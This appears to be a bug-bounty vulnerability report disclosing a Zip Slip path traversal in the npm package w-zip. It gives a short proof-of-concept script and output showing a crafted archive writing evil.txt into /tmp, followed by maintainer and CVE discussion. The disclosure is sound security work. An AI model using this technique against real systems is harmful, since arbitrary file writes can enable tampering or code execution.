Path Traversal in yuda-lyu/w-zip
Reported on
Oct 11th 2021
Description
w-zip is vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip).
Proof of Concept
// poc.js
var wz = require('w-zip');

// Layout assumed by the PoC: the zip-slip archive downloaded in step 2 below is
// saved as ./testData/outputZip/zipslip.zip and is extracted into
// ./testData/outputZip/extract/zipslip.
let fpUnzip = './testData/outputZip'
let fpUnzipExtract = fpUnzip + '/extract'
let fpZip1 = fpUnzip + '/zipslip.zip'

async function checkzipslip() {
    // unzip: w-zip follows the archive's "../" entry and writes outside the target directory
    console.log('unzip1 before')
    console.log('unzip1', await wz.mZip.unzip(fpZip1, fpUnzipExtract + '/zipslip'))
    console.log('unzip1 after')
}

checkzipslip()
    .catch((err) => {
        console.log(err)
    })
Execute the following commands in the terminal:
Download
1. npm i w-zip  # Install affected module
2. Download the zip-slip example archive from https://github.com/snyk/zip-slip-vulnerability/blob/master/archives/zip-slip.zip and save it as ./testData/outputZip/zipslip.zip
3. node poc.js  # Run the PoC
Output
┌─[user@parrot]─[~/node_modules/w-zip]
└──╼ $node poc.js
unzip1 before
unzip1 done: ./testData/outputZip/extract/zipslip
unzip1 after
┌─[user@parrot]─[~/node_modules/w-zip]
└──╼ $ls /tmp
evil.txt
Check the temp folder for the evil.txt file.
Impact
It may lead to Information Disclosure/DoS/RCE.
Occurrences
SECURITY.md
2 years ago
@admin I see the @maintainer has added a commit - https://github.com/yuda-lyu/w-zip/commit/d7039d034e02fa358e6656565157cedf5fa83288 3 days back which fixes the issue reported here. However, he has not approved the issue here. Can you please look into this?
I have dropped a message on the GitHub Issue, and 🤞 the maintainer will get back to us shortly.
@sheldor2021 - sure!
When our system does not automatically assign a CVE, we require a confirmation from the maintainer that they are happy to assign a CVE.
@yuda-lyu - are you happy for a CVE to be assigned for this report?
@yuda-lyu Can you please confirm if a CVE can be assigned?